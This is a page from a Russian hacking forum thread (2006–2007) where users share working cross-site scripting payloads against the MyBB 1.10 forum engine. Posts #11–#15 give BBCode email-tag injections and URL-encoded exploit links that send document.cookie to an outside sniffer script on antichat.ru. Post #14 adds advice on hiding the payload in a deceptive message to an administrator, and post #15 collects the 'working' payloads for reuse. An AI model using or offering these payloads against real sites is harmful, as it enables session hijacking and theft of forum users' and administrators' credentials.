HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу Уязвимость движка MyBB
   
Ответ
Страница 2 из 2 < 1 2
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 03.07.2006, 14:58
Romaxa55
Участник форума
Регистрация: 19.10.2005
Сообщений: 128
С нами: 10819920

Репутация: 83
По умолчанию
Хммм что то всеравно не то, получаю такой исходник
Код:
>[c ode][e mail=a&quot;style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+(document.cookie);this.sss=null`mail@mail.ru ]sex[/e mail][/c ode]</textarea>
Не могу понять, почему код алерта работает
[c ode][e mail=a"onmousemove="alert(document.cookie);"mail@m ail.ru]Нажми сюда![/e mail][/c ode]
Хотя на выходи я вижу вот что:
<a href="mailto:a"onmousemove="alert(document.cookie) ;"mail@mail.ru">Нажми сюда!</a></div><br />
Чтож такое, люди, может кто знает?
Последний раз редактировалось Romaxa55; 03.07.2006 в 15:05..
 
Ответить с цитированием

  #12  
Старый 03.07.2006, 17:23
Cheburek
Новичок
Регистрация: 22.05.2006
Сообщений: 18
С нами: 10511461

Репутация: 0
По умолчанию
Romaxa55, кинь в пм ссылку на сайт? А активный xss тоже не сраотал? Странно....
 
Ответить с цитированием

  #13  
Старый 03.07.2006, 17:49
Romaxa55
Участник форума
Регистрация: 19.10.2005
Сообщений: 128
С нами: 10819920

Репутация: 83
По умолчанию
Вот что у меня заработало, межсайтовый скиптинг но какз наете не совсем удобно его юзать админ не так уж глуп чтоб юзать линки незнакомые. Хотеловсь бы что нить с бб кодами, но выше приведеные советы не помогли, везде чтонить да фильтруется. Может можно вставить код который при наведение мыши не алер вылетал а окрытие страницы происходило?? Вот пример сплоитов:

Код:
http://forum.host/member.php?action=do_login&username=(Login]&password={pass}&url=">%3C%73%63%72%69%70%74%3E%69%6D%67%20%3D%20%6E%65%77%20%49%6D%61%67%65%28%29%3B%20%69%6D%67%2E%73%72%63%20%3D%20%22%68%74%74%70%3A%2F%2F%61%6E%74%69%63%68%61%74%2E%72%75%2F%63%67%69%2D%62%69%6E%2F%73%2E%6A%70%67%3F%22%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%3C%2F%73%63%72%69%70%74%3E
Код:
http://forum.host/private.php?to=asda&subject=asd%3E&font=-&size=-&color=-&mode=advanced&message=sd&options%5Bsavecopy%5D=yes&options%5Breadreceipt%5D=yes&action=do_send&pmid=&do=D3vil-0x1%22%3E%3Cscript%3Eimg%20=%20new%20Image();%20img.src%20=%20"%68%74%74%70%3A%2F%2F%61%6E%74%69%63%68%61%74%2E%72%75%2F%63%67%69%2D%62%69%6E%2F%73%2E%6A%70%67%3F%22%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65;%3C/script%3E&preview=Preview
[mod]Убедительная просьба ко всем: Вместо тэга [quote] при цитировании кода использовать тэг [code] Чтобы топик не разъезжался. Спасибо. [/mod]
Последний раз редактировалось Azazel; 03.07.2006 в 18:19..
 
Ответить с цитированием

  #14  
Старый 03.07.2006, 21:45
Cheburek
Новичок
Регистрация: 22.05.2006
Сообщений: 18
С нами: 10511461

Репутация: 0
По умолчанию
я з@#$%^ся его подбирать.... вот пассивный xss ...
Код HTML:
[*code][*email=a"style="top:expression(eval(this.sss));"sss=`ii=new/**/Image();ii.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;this.sss=null`"mail@mail.ru]Нажми сюда![/email*][/code*]
добавлено позже:
можно в style добавить style=visibility:hidden; и написать админу вообще левую телегу ... он даже и не подумает что в сообщений может быть что-то потенциально опасное...
Последний раз редактировалось Cheburek; 03.07.2006 в 22:01..
 
Ответить с цитированием

  #15  
Старый 04.07.2006, 01:46
Romaxa55
Участник форума
Регистрация: 19.10.2005
Сообщений: 128
С нами: 10819920

Репутация: 83
По умолчанию
Хочу выразить огромную благодарность Cheburek'у!!!
И давайте подвидем итоги по уязвимости MyBB v1.10

Рабочие XSS:
с Алертом
Код:
[code*][email=a"onmousemove="alert(document.cookie);"mail@mail.ru]Нажми сюда![/email*][/code*]
Со сниффером:
Код:
[*code][*email=a"style="top:expression(eval(this.sss));"sss=`ii=new/**/Image();ii.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;this.sss=null`"mail@mail.ru]Нажми сюда![/emai*l][*/code]
P.S. При использывании кода необходимо убрать звездочки!


Тема может быть закрыта!
 
Ответить с цитированием

  #16  
Старый 22.08.2007, 21:56
schut123
Участник форума
Регистрация: 02.01.2007
Сообщений: 202
С нами: 10187606

Репутация: 99
По умолчанию
Не работают эти эксплойты, так как стоит фильтрация на ковычки и Bb коды
 
Ответить с цитированием
Ответ
Страница 2 из 2 < 1 2



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Подборка уязвимостей phpBB -=ka$at1k=- Уязвимости CMS / форумов 3 02.07.2006 15:26
Свеженькая XSS уязвимость в форуме mybb 1.10 Vantuz86 Уязвимости CMS / форумов 0 11.04.2006 22:58
Есть ли уязвимость в форумах созданных на http://www.1bb.ru/ ? bike Уязвимости CMS / форумов 2 24.12.2005 17:28
Заключение MyBB KEZ Уязвимости 4 31.03.2005 12:51
Уязвимость в iChat'е. -SX- Болталка 0 15.01.2005 23:46



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.